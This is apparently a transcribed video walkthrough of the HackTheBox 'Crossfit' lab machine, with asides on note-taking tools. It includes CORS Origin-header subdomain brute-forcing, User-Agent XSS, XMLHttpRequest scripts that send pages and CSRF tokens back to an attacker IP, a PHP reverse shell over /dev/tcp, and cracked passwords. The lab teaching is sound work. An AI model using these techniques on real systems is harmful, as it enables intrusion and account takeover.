What's going on YouTube? This is Ipsac and we're doing Crossfit from HackTheBox. And I really like this box because it is an insane box, but it isn't insane because of just the technical knowledge required to do this. It's more so just a bunch of hidden gems that's like, oh my God, I didn't know this existed. So for example, it starts off with a cross site scripting where you can verify it does exist, but you can't really get any useful information out. However, if you did a DNS brute force of this box through standard methods, you don't really get any subdomains. However, one of the security features within CORS, the origin header, actually enables us to brute force subdomains. So it's not a virtual host, you just do kind of how a virtual host brute force works with subdomains, except instead of host name or host header, you do it in the origin header and you can get subdomains. It's really awesome. You do a bunch of cross-site scripting in this box. Then as the Hank user, you find some DevOps artifacts. And then as Isaac, you exploit a PHP script. And then once you get on as Isaac, there is a custom binary that isn't doing a buffer overflow. It's just finding a way to abuse its logic. So with all that being said, let's jump in. But before we get started with the nmap, I want to do something a little bit different and install a good note-taking application called Obsidian, because I've been working with OXDF lately, who doesn't use this application. I think he just does everything in Typora, but he's just amazing when it comes to taking notes. By the time he finishes a HackTheBox machine, his blog post is almost done because he's just taking such good notes as he goes. So it really inspired me to take better notes. I looked up some applications that are better than like my old cherry tree or whatever I used, and I came up with Obsidian, so that's what I'm going to be showing here. But hopefully by me taking better notes, it teaches you how to take better notes, and we can all just take better notes together. So I downloaded Obsidian, and I'm putting it in .local.bin, and then we can make this executable. And then go over here, and let's just launch Obsidian. And then this is going to ask us to create a vault. So I'm going to create the vault. We'll call it HackTheBox, and then the location of the vault is going to be HTB, and we'll call this Obsidian, and then click OK. And hopefully there's no boxes that ever launch on HackTheBox called Obsidian, because we'll have a naming conflict. But now that we have this, we can just go over here, do Control-N to create a new note. Actually, I want to do a folder first. I'm going to click the folder icon because I don't know all the hotkeys. I'm going to call it Crossfit. And then this note, I'm going to label it, I'm going to start at 10. And this will just be comment enumeration. And we'll put this in the Crossfit folder. And we start out with nmap. So let's go and nmap this box. So we'll do sudo nmap-sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it Crossfit. And then the IP address, which is 10.10.10.208. But this can take some time to run, so I've already ran it. Looking at the results, we can see just 3 ports are open. We have 21, which is FTP, and based upon the scripts, this is weird. There's a SSL on FTP, which is pretty unique. We have SSH on port 22. It tells us it's a Debian box. And then we have good old HTTP on port 80. So what I'm going to do is copy this whole thing. I'm going to go under the nmap directory. I'm going to put 3 backticks and then type bash. And that's going to be the syntax highlighting, the very first line there. And then 3 backticks, and that escapes my code block. I'm going to hit Control+ a few times to zoom in for you all. And I'm also going to take some notes here. So we're going to say FTP over SSL. HTTP's on a default page. And the host is going to be, where's the Debian? Right here. So we'll just copy this and paste it. And the default page on HTTP I just got here. We can see HTTP title, or HTTP title, Apache 2, Debian default page. So we got all that with nmap. So now let's go and take a look at that SSL on FTP. So if I just do telnet 10.10.10.208 on port 21, it looks like FTP works. What? Let's see. Hold on. Can I Control X out of this? Control character that. Exit. Quit. There we go. Sometimes it's so hard to exit commands. Let's try FTP 10.10.10.208. And we'll try logging in with anonymous, and login incorrect. So I'm going to try openssl client to see if this actually is listening over SSL as well. So sclient -connect 10.10.10.208 port 21 -start TTLS FTP. Is it start TLS? Yeah, start TLS FTP. And we get the certificate. So looks like it's listening both over regular FTP and some SSL FTP. So what I'm going to do is copy this, and we'll also paste this below. So grab SSL banner, FTP, put it as bash again, and then I'm just going to put ... snip ... to let me know I truncated this output. And then if we click on this preview, we can see exactly what it looks like. So we have nice, pretty syntax highlighting. I'm going to do 2 indents and do common, enumeration. So the idea of doing that is I'm going to create many pages here, and then we're just going to concat them all into one. But this just helps me organize it a bit better. So we have grabbed the SSL banner via FTP, and we can see the common name is stir.crossfit.htb. And we also have this info@gymclub.crossfit.htb. So what I'm going to do, copy this. I'm going to do new note, and we'll start at 05 and say loot. And this will be, loot emails, and we got that email already, and that's from the SSL certificate. So we have 2 things we can add to our host file. If we went straight to 10.10.10.208, we would see this is the Apache default page. We could run a GoBuster here, but we do have 2 domain names to try. So let's copy this, the Gym Club HTTP, and we will sudo vi etc host and do 10.10.10.208, paste that, then paste regular at crossfit.htb. Okay. So now when we go to crossfit.htb, what do we get? Yes, take me there. Still the same Apache page. Let's try Gym Club. And what do we get? We get a web page. So what I'm going to do here is we'll take a screenshot. I think it's Control-Shift print screen. Nope. Control print screen. Actually, let's just take a step back and install a different application to do screenshots and make it a bit more intuitive. So what I'm going to do is sudo apt install flameshot, which is just a pretty cool screenshot utility. And then once this is installed, we can go over to System, Control Center, search for keyboard, and then go over to keyboard shortcuts. And we want to, I'm going to delete the one I have for it so I can show you creating it. So we can do file name, the name is flameshot, and the command, we want to do user bin flameshot, and then GUI, which is the argument. And then do apply. And we see flameshots here, it's disabled. I'm going to double click on disabled and hit print screen. And now we should have flameshot running. And what flameshot allows us to do is as soon as we hit print screen, this thing pops up, and it's really nice because we have various options we can do with it, like use a pencil to write, add text to it, blur things, and everything. So what we want to do is just send it to clipboard. So copy the selection to the clipboard, and then we can go into a notes, common enumeration, and say something along the lines of Gym Club virtual host. and paste this. What I'm actually going to do, instead of putting this under common enumeration, I'm going to create a new note. We'll do 11, and we'll call this web pages. And put this under CrossFit. And instead of 11, I'll do it 15. I always like splitting numbers up, so if I want to put something between loot and common enumeration, I can easily do that. So we'll say virtual host, and this will be gymclub.crossfit.htb, and we can paste that. And then if we go over to a preview command, we can see it. And if for some reason you wanted to split the pane, you can always do it vertically and then view it like this and interact with them multiple times like that. So now we have the gym club. So what I want to do is go over to GoBuster, and we're going to run a GoBuster on this. So GoBuster, I'm going to do virtual host because we already have one host, and that SSL certificate has star.crossfit.htb. So I'm thinking there's probably another host on here. So I'm going to do GoBuster vhost, and then we want to do -u http crossfit.htb and -w for word list, opt seclist discovery DNS. I'm going to do subdomains top 1 million. We'll do 20,000. I'm going to first do -v so I can see all the host it's brute forcing. And we can see images.crossfit.htb, which looks good. So I'm just going to run this, and we'll do -o, and I'll make a directory, GoBuster. And we'll do GoBuster vhost.out. So now we are running GoBuster, and we can take a look at the website. So at gymclub.crossfit.htb. And whenever I look at websites, there's a few things I look for. Usernames, emails, and just where user input is the main three. So scrolling around at the very bottom, we have this info@crossfit.htb, which I think is in my loot already. So we don't need to take note of that. And it doesn't look like there's any user. Oh, wait, there's a contact us. So we can say, let's go up like that. And then go back here, and let's do a new note, 20, and this will be gym club. And we'll put it in the CrossFit directory web page. This will just be gym club. And we'll call this user inputs. And the very first one is going to be index. And let's do flameshot. So print screen. And we will copy this. I always like grabbing the URL. And we can grab this and circle it as a contact form. And then copy selection to clipboard. And we can paste that there. And let's see if there's any other places we can do user input. So if we click around on this calendar, doesn't look like we have any links to go to. I was hoping maybe we could book an appointment or something. The About Us page looks like we have a few names. So let's put all these names in our notes. So go to loot, and I'm going to put, instead of emails, people, and let's copy these names. Becky Taylor. I don't know if I needed to copy all of those. Noah. Yeah, I don't know why it's copying all of that. Then Evelyn Fields. And then the last one, Leroy Guzman. So we got a list of people now on this page. There's nothing really else on this. So let's go take a look at the next thing, which is schedule. And let's see if our Go Buster is finished. It is almost done, so I'm going to get ready to start the next one. So Go Buster dir-u http gym-club.crossfit.htb-w for word list opt sec list discovery web content raft small words .text -x for arguments php Go Buster / gym club -root and start this Go Buster up. We have no new host here. So what I'm going to do is go back to common enumeration and say we did it. So nmap Go Buster did not return anything. And if we wanted to, we could be diligent and put the command here. Bash paste. It always should end new line 3 backticks. There we go. So where were we? We're still looking at user inputs. So scrolling down this page, don't really see anything. There is this book now, but can't really click anything. The gallery looks like we got pages, but nothing here. If we went deep into these, we could potentially find more usernames, but not too interested in that right now. Main thing is just looking for user input. So if I do show 1929, I was seeing if this would change up here to be like an incrementer. And if this was like page 2 of 3, if this would do $page equals 2 or something, but I don't see that. So let's go to blog details. Scrolling down, we do have a leave a comment. So you guessed it. Let's take a screenshot, copy this, send it to clipboard. And this is blog-single.php. Paste. And nothing else here. So let's go to contacts. See what we have. There is a get in touch. And we got this email here. So let's go back to loot, email, paste this. That is a different email than we had before. And take a screenshot of this one. So we have 3 different places we can have user input. Let's go back to Obsidian, Gym Club, contact.php, and paste this. Let's go back to our Go Buster. We're about 18% done, so nowhere near finished. We'll just keep that one running and play with these contact forms. So let's get in touch. Test at gmail.com, and let's just try basic cross-site scripting. So script source http 10.10.14.4/test.js/script, and we probably should make these hit our web server. So Python 3-m http.server port 80, and instead of doing test.js, I won't know if like which page got hit. So I'm going to do contact.php, I guess. So if this cross-site scripting works and someone hits our web server, we'll know because this will say contact.php. So we send that, and your message was sent successfully. Let's go to blog details. Do the same thing, except this will be blog single and name test root at ipsec.rocks, and let's do 8675309. I'll put 3 5s for the area code. Post comment. And we have a cross-site scripting attempted. So this is weird. Test root. I'm just doing this for the screenshot to put it back. And we'll do print screen, copy, copy to file. Let's go Obsidian, new file, 25, gym club XSS. And let's see, let's name this one Cross Site Scripting Attack. We'll say detection and paste the screenshot. And upon sending script, let's just say XSS payload to blog-single.php, this error is displayed. I always try avoiding like personal things like we, I, whatever. I always just try to avoid that because it's just cleaner writing if you don't. So we have this said. And let's see, a security report containing your IP address and browser information will be generated and our admin team will be immediately notified. If we look at a web server, we still don't have anything. So let's be thorough and do the very last cross-site scripting one to see if anything does hit. I think it was on the homepage index. At the very bottom, there was a contact right here. We'll call this index and test 555-867-5309, and we sent that in. So we don't have anything. I'm going to open up Burp Suite, and one of these times I'm going to learn Zap because my Burp Professional expired and I don't feel like renewing it. So we'll switch to Zap eventually once I learn all the hotkeys and everything. But for now, Community Burp is fine. So we don't have to update for this. All I want is the repeater tab. So it's starting the project. There we go. And hopefully my font size is, I probably want it bigger, don't I? Window, no. User options, display, change font. Let's go to 16 for you all there. And we'll do 14 in this. There we go. That looks fine. So now let's send this to Burp Suite. So go up here, Burp Suite, and let's see, intercept is on, post comment, send, go to the repeater tab, and notice the message, a security report containing our IP address and browser information. Well, we can't really change our IP address easily, but we can change what the browser information is. So let's go over here and user agent, let's do script source is equal to, we'll call this user agent.php. And we send that. If we go back here, we have a get on user agent.php, which is good. So we've now confirmed that the user agent of whoever, the page someone goes to view security reports is cross-site scriptable itself within the user agent. So they probably have some type of filtering here because they detected cross-site scripting on user input. And then that field goes, this goes somewhere into the application and there's a report that's generated and they're like, here's this user input, it's cross-site scripted. We know this was malicious, so we did sanitization here so you can't get infected. However, they did not expect the user agent to be manipulated by the user. And on the page that is getting viewed, the user agent's also there, so we can put cross-site scripting here. One of the things I love doing with cross-site scripting is just making it a chain. I don't like typing a bunch of cross-site scripting up here. Instead, I want to make it load a JavaScript off of my box, and that just lets me edit it much easier. That'll make more sense in a second. But let's create this screenshot to show this worked. And instead of using Python, I want to do netcat on port 80. And this is going to let us capture the user agent. So we're going to send this. And it should make a request any second. And we can see user agent this. So I'm going to go back to my print screen command. I was debating if I wanted a print screen or just copy and paste, but I want to get my Burp Suite window in as well. So let's print screen, go back to Obsidian, and say initial POC, paste that. That looks good. And then at the very end, we can go and add text here to make it look pretty. But we don't want a note-taking process to slow us down too much. We got the screenshot, the hard piece, so we can move on and type later. So that is there. Let us create a www directory. So make dir www. We're going to start the Python web server back up here. And we got 0.js. So the very first JavaScript I want to do is just a document.location to see if I can steal their cookies. So HTTP 10.10.14/+ document.cookie. Okay, so now if they have a cookie and view this page, we should be able to retrieve it. So got 0.js, but it did not go. Oh, I don't think that's valid. I think it's just document.cookie. There we go. So if they had a cookie here, this is where it would be after this. And since it just went to / there's no cookies for us to steal, or they're marked secure or something and won't send it this way. So we have some more like things to do here because we have cross-site scripting, but we don't know what we can do with it. If we go back to our GoBuster, it is still running. And if we went through the website, if we go maybe burp, sitemap, I don't know what I was trying to show there, but we don't know what we can do with this cross-site scripting. So I'm assuming there's going to be something we can do to enumerate other subdomains. We did GoBuster and it came up with nothing. But if we look at the repeater, let's just make a GET request that's empty real quick. So GET / like this. We can get rid of the virtual host routing. So we can just call this Crossfit, or it doesn't even have to be a domain name, 10.10.10.208. What? Get / there we go. One in all caps. That's weird. But this is the Apache default page. But we can see it is allowing, oh, because we have this origin. So even though we did this host 10.10.10.208, because we have this origin set, this access control allow origin line is set, validating that this is the domain name. So this is something called CORS, and it's just a browser security mechanism. I think it's crossed origin request security. But if we put a invalid name in here, we don't have that one line. We have this allow credentials true, but we don't have it saying what the subdomain is. And we can put other subdomains like admin, and we don't have anything. So we have another way we can brute force the domain name is through this CORS origin header, because upon a valid header, this page will give us a different header of saying it's valid. So if we do again, gymclub.crossfit.htb, this is the header we want to look for. So let's go back and do a second subdomain enumeration, this time with the origin header instead of the host, which is for virtual host. So let's go back here to this pane. GoBuster is finished. And to do this, I'm going to use ffuf. And the main reason why I'm switching to ffuf over wfuzz is HackTheBox has a nice academy that teaches you how to use all these cool tools and do some like advanced things with them that aren't too intuitive. So I'm doing ffuf, opseclist discovery DNS. We'll do the subdomains. Let's do top 5,000 instead of 20,000. -u for URL, HTTP 10.10.10.208. -h, we want to add the header. So origin, HTTP ://fuzz.crossfit.htb. And then we want to -mr. And that's not magic resist. That is match response. So if we do ffuf -h, you can see the match options. And this is like hide or show in wfuzz language. But like we can match the code, the amount of lines, match regular expression, not response, regular expression, size and words. So we want to match a regular expression for, what is it? Go back to our burp suite, this. We want to find any request that has this line in it. And I'm going to add the dash dash, or I think it's -1 or 1 dash, ignore body, because I don't want this whole request looking through the body, which is this bottom piece. It can just take a little longer. So let's see what this ffuf command goes with. And right off the bat, we have ftp with a hit. So I'm going to copy this. And I guess we could wait till it's done because it's going to be done in a second. We can copy this whole command. And then I'm going to go back to comment enumeration. I'm going to go down and say subdomain brute force via course. And then same thing. And then if we view this syntax, there's a piece I don't like. I don't like how it's not highlighting all the arguments because I didn't put them in quotes. So I'm going to clean that up. So if I just go, and for you, I will split the screen vertically so you can see exactly what I mean. So right here, if we go down and edit this and put this in quotes, you can see now this piece is highlighted, and I'm going to do it for the next one. So if we just put quotes here, now our command looks a little bit prettier. Okay. And we have a subdomain, FTP. So let's go and add FTP, and we got www.ftp. So sudo vi etc host, and we can do ftp.crossfit.htb. And when we try to navigate to that page, you just get this Apache page. And that's not a surprise because, I mean, we already brute forced that with the Go Buster. What I'm going to do is try adding this origin and seeing if that does anything. And to show you exactly how it detected, again, if we do ftp.crossfit.htb, we get that line. So let's go and edit a proxy, or edit the request by intercepting. And then we'll paste the origin in, forward. We still get this. But CORS is what allows one web application to access another one. So what if we made a cross-site scripting payload and actually like use their browser to proxy a request back to us? So if we went back to our initial cross-site scripting payload, this is very rudimentary. We're just making the browser make a request to us. If we use the XML HTTP request, we can make the browser go somewhere and then return the response to us. So I'm going to do vi1.js. I'm going to do var target is equal to http ftp.crossfit.htb. And this needs to semicolon at the end, I think. We can do var request1 is equal to new XML HTTP request. And if this confuses you, I did this a long time ago in the holiday video. That's the one I always go back to. So request1 is equal to open. This is a GET request. I'm going to do it all capitals because I didn't do that in burp and something weird happened. And then this last one, this is async. If this was true, then it would move to the next line immediately and process it. But it being false means this is a blocking command, so it won't move to the next request until this one finishes. So rec1.send, and then we want to capture the response. So var response is equal to request1.response text. And now we want to open a second request, and this goes back to us. So var rec2 is equal to new XMLHttpRequest, and then request2.open, and this is going to be a GET request. We could do post, and that would be cleaner, but I'm just going to do a GET back to us because it's less code on our end to handle it. I'm going to do plus B2A, which is base 64 to, this converts it to base 64. I forget what it stands for. But yeah, B2A response. And then this one, we can just say it's true. It doesn't matter what that is. rec2.send. That looks good. It's probably not going to work the first time because I'm known to make typos. But if we go back to our repeater, and let's go and edit our payload to say, hey, go get one.js, and then wait. We got one, and we got some text right away. Awesome. So I think that worked. So let's see what this looks like. So let's do vi, or let's go www v-index.html, echo-n, paste the base64, base64-d, index.html, and we can do Firefox index.html to see what it looks like if we wanted to. And there is this create new account, which is accounts create. So we got a list of usernames and potentially a way to create an account. So let's try stealing this accounts create page. So I'm going to, wait, would I create this? Am I just in root? I am. Move star.js to www, and let's go up here in www so we don't expose all of our notes to anyone who hits our box. So go into www, copy 1.js to 2.js, v2.js, and we want to steal this /accounts create page now. And go to burp suite, 2.js, send it, and we get a big piece of text. I'm going to make dir -p accounts. I don't know why I did that. Let's just do vi create.html. I was going to try to like clone the page, but this is easy enough. It was account. Okay. And we can look at create.html, or we could just, again, Firefox to open up create.html. And we can see it's got username, password. And if we inspect the source, there is this CSRF token. So we have to grab this token if we want to send a response. And it needs username and password. So the main thing we have to do is get this CSRF token. So I'm going to copy 2.js to 3.js. And we're going to grab this request. So we are already there. And then we want to say var parser. So we're going to parse this document is equal to new DOM parser. And then we're going to do a var doc is equal to parser.parse from string response. And we're going to tell it it's an HTML document. And response is rec1.response text. Then the next thing we want is var token is equal to doc.get elements by name, and it's underscore token, and it's the very first one we want to get. This will return a array, and that's what we want. So for this, I'm now going to return token because I just want to make sure this works. So if we go to burp suite, send the request, and we wanted 3.js. Go back here. It looks like that worked. This looks like a token. Let's send another request. And yep, we are getting tokens. So let's just exit this pane. v3.js. So now we want to make them do a second request. So they're still going to go to the target. So this will be, what is it? HTTP ftp.crossfit.htb/ where is the post? So we got form. It sends a post to /accounts. So /accounts. And we don't have a token. So the next thing we have to do is create parameters. So params is equal to username is equal to ipsec. I think it was pass is the next variable. Yeah, name pass. Pass is equal to please subscribe, and underscore token is equal to plus token. And that should be good. We can move this request down. And we can say this is now a get, it's a post. And we actually have to modify this a little bit, because if we don't do this, it's not going to keep the session. So what we want to do to keep session is go up here, and we want to do rec1.with credentials is equal to true. And we want to do it down here as well. So rec2 like that. And then we need to set the request header. And that's going to be content type. And it is a application /x www form URL encoded document. The MIME type for just a regular HTML encoded document. And now we can do rec2.send params. And those parameters are these up here. And then we can say var response2 is equal to rec2.response text. And we can send it back to us. So let's cat 2.js to grab this. And send it, but this will be 3. Okay, so if this works, we should be able to get a user created on this box. So let's send this and modify this to be 4.js. And it got 4, but it didn't progress. Oh, it's 3.js, I think. It didn't progress because that was a 404 error. 3. 200. And nothing. So let's take a look at this file. We can probably ignore this whole top part because that has worked. This bottom part has worked, but I'm noticing one thing right now. We're not in async mode. So let's, well, I don't know if we are or whatever. It's not blocking. So this one will return before this can finish. And I'll leave that as true just to see if we have anything and what type of error message this creates. And I'm looking at the next. We do have rex3 here. So you just want to put that as rec3. And then I'm looking at the response. We're not doing response 2. We're just doing response 1. So we can change that. And I'm going to let this run. But again, I don't know if this is going to work because this one is set to true. So let's just see what happens. If I go back, so we have our Python. Let's go send. And we're going to get 3 in a second. Come on. There we go. And it just gets slash because response doesn't equal anything yet. So let's change this to be, let's see, rec2. Change this one to be false and see what happens. Send. And we get a bunch of stuff. So if you're curious how you find that type of stuff, because it may be like black magic of me just changing random variables that aren't labeled, if we go to like new XMLHttpRequest open, so let's do XMLHttpRequest open. Probably have to turn this off, burp suite. And here is the man page, if this loads. And we can see method, URL, and then async. And it's telling us what this is. If the value is false, the send method does not return until the response is received. So that's why I kept meaning about it's being blocking. But we have this now base64. Let's take a look at it. Oddly enough, it's 404 because of our Python request module. So let's copy this. I know I probably could have just copied it with the mouse. Probably would have been faster. So let's do echo-n, echo-n, control-shift insert. Oh no, I copied with tmux. My bad. base64-d. Then we can paste this to response.html and go Firefox response.html. And it's just an error message. 500. I wonder if that means access denied. Let's see if we can log in. So let's do lftp, and then we have to set ftp SSL force to true, and then set SSL verify-certificate to no. And then we can connect 10.10.10.208, log in with IPsec, log in IPsec, password of please subscribe, and do a dir. And it works. So we have an account now. And oddly enough, we have a few things. We have development-test, which I haven't seen before, FTP, Gym Club, and HTML. This looks like the var dub directory. It doesn't look like you can look at it, but just based upon it being HTML and then a few virtual hosts, I'm assuming this is var dub. So let's go back to our notes that we've kind of neglected for a while. So we're going to have to clean these up. Subdomain brute force, and then we also have subdomain found via FTP. This one, 2. Whoops, I want to insert. Am I doing 3 or 2 here? 2. Just going to copy this whole thing. We'll do bash, paste, like that, and let's get rid of the second pane. Makes it easier for me to read. So we have a few subdomains. Before we go into this, I want to catch up my notes. So I'm going to go to a new pane. Let's cat 0.js, go into www, cat 0.js. This is document.location. Did we put that in our XSS? No. Yeah, we have not. So what we can do is copy this, and we're going to do 3 backticks, JavaScript, because this is now JavaScript, and check browser. So what this one did, it didn't return a cookie. Whoops. But it did display we had JavaScript execution. So the very next one, this is where we went into the XML. So cat1.js, and I'm going to try xclip -selection primary. Does that work? JavaScript? No. That did not. let's see, dash selection, clipboard. There we go. So this next one would, didn't return a cookie, so get FTP page. Used XMLHttpRequest to return a page. Okay. Then the next thing we have to do is go, you guessed it, go to 2. Paste this, and this is going to be this one tested tokens. I'm going to label this like that. Wait. Oh, this one got the accounts page, and I'm not sure we have the playing with token one. We probably deleted that. Do I have a 4? Yeah, I deleted that. Creating a user, JavaScript paste. Okay. Grabs token on accounts create to create an account. There we go. So now we're all caught up on documentation already. That only took probably 3 or 4 minutes, but that will definitely save us time down the road if we ever have to explain what we did. So now we're in this. Let's go to cd HTML, and what directory was I in? I was in www. So I'm just trying to put 0.js in these directories to see if there's anything. We couldn't create file in HTML. Let's go to gym club. Put 0.js. Access failed. Let's do a dir. We can get db.php. I was just looking for like a config or something like that. cd dot. We could also dir HTML to see if there's any goodies in there, but there's just the index. So let's go to ftp and put, was it 0.js we're trying with? Could not create file. We have this, and this is Laravel. If we do dir-a, there is a .env, so we can get the .env. There's also a .git directory. So we have that. Let's go, and the -a meant show all files, which includes hidden. Development-test, and put 0.js. And this one actually transferred. So let's go out of that, and let's create ip.php, php system, and we'll do --c, --i, was it like that, dev tcp 10.10.14 4/9001, like that. Okay, and we can put ip.php, nclvnp 9001, and we have to probably edit our host file. So sudo vi etc host, and this will be ftp. We already have that. So we can just go ftp.crossfit.htb/ip.php. And we get not found. So the next thing I want to try doing is editing the 0.js and just forcing their web browser to hit this. So we could have even done it with script, but it doesn't really matter. So ftp crossfit.htb/ip.php. Like that. Save it. And we also need python 3-m http.server on port 80. And we can go back here and tell him to get 0.js. So we should see 0.js. And it doesn't look like it worked. If I do a dir, that still exists. Oh, I'm sorry. It's development-test. So sudo vi etc host development-test.crossfit.htb. There we go. And we can try accessing it here. Development-test HTTP not found. So we can go back to 0.js. Did I copy the whole? I think I copied this whole thing. There we go. And we get 0.js and get a shell. So what we want to do is show that we can do this. So what I'm going to do is go back here. And this looks good, actually. We'll leave 0.js. So grab this, copy, Obsidian. So we'll create a new one. 30-gym- we'll do ftp. And let's just paste, bash. And then the next one is 0.js. We don't need that. We can just do if.php and copy this. And the reason why I just didn't do like system argument is because this is actually more secure when you're on an engagement. It kind of gives away, like, it's worse OPSEC because you're hard coding an IP, but no one else can really abuse that shell because the IP address is something I own. If they guessed how I did like arguments in my parameters, then I would, well, if someone found it, they could potentially reverse the script and exploit the client. So created in, what was it, 25 gym club CrossFit. So that just creates a link. And this is one of the cool things about this application. If you do create links between your documents, let's say you had one link that had a bunch of like cross-site scripting references, it gives you like a mind map and links the two. So it's pretty cool. I don't know if I'd use that feature too much, but it is there. So we have those two. And with this shell, see, where am I? To unzoom. There we go. So let's get a better shell. So let's do Python 3-c import pty.spawn bin bash. Awesome. Control Z, stty, raw minus echo, fg, enter, enter. I know it doesn't show anything when you type those things because you removed echo from stty. And then let's do export term, I think it's all caps, is equal to xterm. And now I can clear the screen. Awesome. The first thing we probably should do is run linps. So let's go and back in our www directory, let's do a cp opt privilege escalation awesome script suite linps linps.sh to our current directory python 3-m http.server. And I'm also going to try something. I don't know if it's going to work or not. So let's do nc lvnp 9002. And we'll direct this output to linps-www.out. And what we're going to do is curl 10.10.14.4 port 8000 linps.sh and tee it to dev. Actually, before we do this, let's fix up our TTY a little bit more. So let's see. I'm going to go to a new pane, split like that. That's the size I am. And we can do stty-a. So we need to remember 16 and 36. So stty rows 16, columns 136. I think it's just cols. There we go. So now I can start typing that linpiece command. So curl 10.10.14.4 port 8000 / linpiece.sh. Pipe that over to T. And let's try dev TCP 10.10.14.4 port 9002. I have no idea if this is going to work. This is exciting. No. Oh, it did not bash. Bash like that. Let's see. I wonder if I should put T here. Yeah, it's not connecting. So let's try cat dash 2 dev TCP 10.10.14.4 9001. Connection refute. So doing 9002, I did. So cat like that. And let's do 9002. I have no idea if this is working. It doesn't look like it is. Let's see. Tail linpiece. Maybe it will at the very end. This isn't a T, so I'm not going to see output as it comes. It's just going to magically stop potentially. And the reason why I want to send it here is because I'm going to have a pain copying this whole output into a clipboard. So if this was a file, I could easily copy it. Let's see. While that runs, we can test. So cat dot to, let's just do test echo hello. Cat test. It's not going to work. So let's go back here. Escape out. If we cat linpiece, didn't get anything. So I'm going to T this. And instead of this cat command, and if this one doesn't work, I will probably just switch it up and write it to a file. There we go. Piping it to NC helped. I don't know why T didn't work. That seems very similar to what I did with T. So we'll just look at this for the output. If we go to the top, what do we have? Nothing too interesting. The software we have on this box. Interesting shells. So you can see my reverse shell. So let's see, let's go back to where it left off. Where is it? Okay. So binary process permissions, nothing interesting. Files open belong to other users. Cron jobs. Let's see. There is an Etsy cron tab. I don't know if it's outputting the data of Etsy cron tab. That looks bigger than I'm used to saying. And it's got this in cron tab. This is actually really cool. In cron tab is like a cron based upon files. So you could do file name space in underscore modify space a script. And when that file is modified, it would go and run that script. Really cool. Cron weekly. Oh, here we have something. A cron. So I'm going to say this will be 35-shell. Let's see. we'll do www data. And let's do linps. So shell as www data. linps. Let's just do bash for syntax highlighting. Cron tab. Looking back. Systemd path. Service files. HTTP sockets. Nothing too interesting yet. Log in now. So we have users logging into the system. We have root, Isaac, FTP, ADM, and Hank. So that could be interesting. So we can copy this and paste it over. Let's see. WP cookies, Apache server info. So we could look for more virtual hosts since we've found 3 now and all of them didn't appear in our GoBuster brute force. Looking at SSL SSH files, nothing too interesting. Looking for a specific config files like Kibana, Vault, AD cached, things like that. Screenshots, tmux sessions. This is a pretty robust checking script. So containers vulnerable, interesting files, specific hashes inside of files. So we have 2 hashes right now. So let's copy this. Whoops. Copy, paste. And it's got limit 70, so I'm going to... Oh, shoot. I control-C'd. Oh, I think I was done. So if we less linps www.out, or less, I think dash capital C for color. There's a way to get color. I'll put in less. Let's just do a VI. This saved weird. Shoot. This is not good. Man less color. ANSI color escape sequence. ANSI. Dash dash color, maybe. Yeah, because of how we outputted this, all these ANSI characters are in, and it made linps a horrible mess. Yeah, that's not great. Oh well, that's a problem for another day. We have a few things we can go off of, and then we'll run linps again normally. Let's clean this up. So this way we can put notes around each. But we have 2 hashes right now we can play with. So, well, we got this cron. So we can see if we can go in home Isaac and see what this is. CD. How do I don't like how it's highlighted. Oh well. Home Isaac. Something we control-C out of. Send updates. And we have permission denied. So we can't go in here just yet to see exactly what the script is. But we know it is running constantly. And we know Isaac logs into the system. We do have specific hashes inside a file. So we have add user Hank and user factory. If I do a ls-la on send updates, the group admins can go into that. If we do a group admins command or groups, is it groups admins? let's just do v etsy group. And let's go to admin. And we can see admins is Isaac and Hank. So if I did groups Hank, it would have shown the members he is. But this Etsy group file is great at showing all the groups and who they're a member of. I know there's probably a way to list the members of a group with a command, but unfortunately, I don't know everything on these things. So let's go and back to a brute force. And this is a SHA-512 crypt. And this is MD5 crypt. What I'm actually going to do, even though this hash isn't useful to us, I'm going to try cracking this hash with RockU first, because if it is like a password reuse scenario, then, I mean, this will crack much faster than 6. So let's go over to the Kraken, SSH, Kraken, and this is just a box I have because I don't like using cracking on like the computer I'm recording from because it's such a CPU intensive process or GPU intensive process also. I'd recommend doing on your host if you don't have a specific box. Don't do it within a VM. So let's do vi hashes / the host name, which is Crossfit MD5 crypt. And we'll put that in. And we'll do hashes. Let's do SHA-512 crypt. And we'll put this one in. We can't crack them both simultaneously, unfortunately, but we can make it so we have to change very little of the hashcat command. So I can do hashcat -- example hashes less MD5 capital C, MD5 lowercase c, crypt, true crypt. Let's see. Is it lowercase MD5? Let's do grep -i MD5, grep -i crypt. Okay. So it's lowercase MD5 crypt. And then I can do a -b for before. So we'll do before 5. That is mode 500. So /hashcat -m 500 hashes / we called it CrossFit MD5 opt word list rocku.txt. And we'll see what password this is. And what? 2y. This is an MD5 crypt. I don't know what I was thinking. This is bcrypt because we got 2 a character and then this will be like iteration count. I'm not sure exactly what I was thinking there. So let's go back and we'll look at SHA-512 crypt because bcrypt is also very slow. So SHA-512 crypt is mode 1800. So we can go back and we can change this to be SHA. And we can change the mode to be 1800. So let this crack. This will probably take a while. Hopefully not too long. Oh, nope, I spoke too soon. This cracked very fast because it must have been near the top of the word list. We got Powerpuff Girls. So let's go back here. We can say Hank's password is Powerpuff Girls. Cracked. And what I'm also going to do is try cracking this bcrypt one because we have it. We can run it in the background while we work. So why not? Let's do bcrypt to * something. So 3200. So go back to this one and we'll specify 3200 and see what that cracks to. Just make sure it runs and then we'll move on to the next thing. Come on, hashcat, start up. Did it finish? What? Let's do --shell. Oh, it's password. Password is always password. So that could be like some default password or something just in a library. Or they have the password set as password. So let's try SSHing in as Hank. So SSH Hank at 10.10.10.208 and the password of Powerpuff Girls, and we get in. So that is www data, and I'm going to call this to Hank. not use special characters in the file name. Okay. And we can create a new thing, 40-Hank. And we can copy this, shell as Hank. Awesome. So what do we want to do here? I want to get a linp's output that is good. So what I'm going to do is curl 10.10.14.4/linps.sh, and we're just going to pipe it over to bash and send it to linps.out. We probably have to specify port 8000. Okay, sh hank at 10.10.10.10.208 and power puff girls. If we go back to what we know, is if we go here, there is a cron that we ran as dub, and Hank is a member of admin. So let's go cd into send updates. I went into 2 directories. There we go. And let's just cat this file, send updates. So it's going to include a few, but now it's going to do a loop. So we have this fs iterator, new file system message dir. For each file, it's going to get the path name. It's going to select email from users. So this is grabbing each row. It's going to run the command user bin mail, add argument -s CrossFit Club newsletter, escape is equal to true, then add row email escape true, file get contents, standard in, and then execute. So it looks like it's grabbing the row and using a shell command to execute mail, grabbing a bunch of arguments from the database and then executing a command. And it's using this library, L shell command library. So let's go and Google GitHub. And let's see, L, was it shell command? There we go, PHP shell command. So what I'm going to do is look at the issues of this 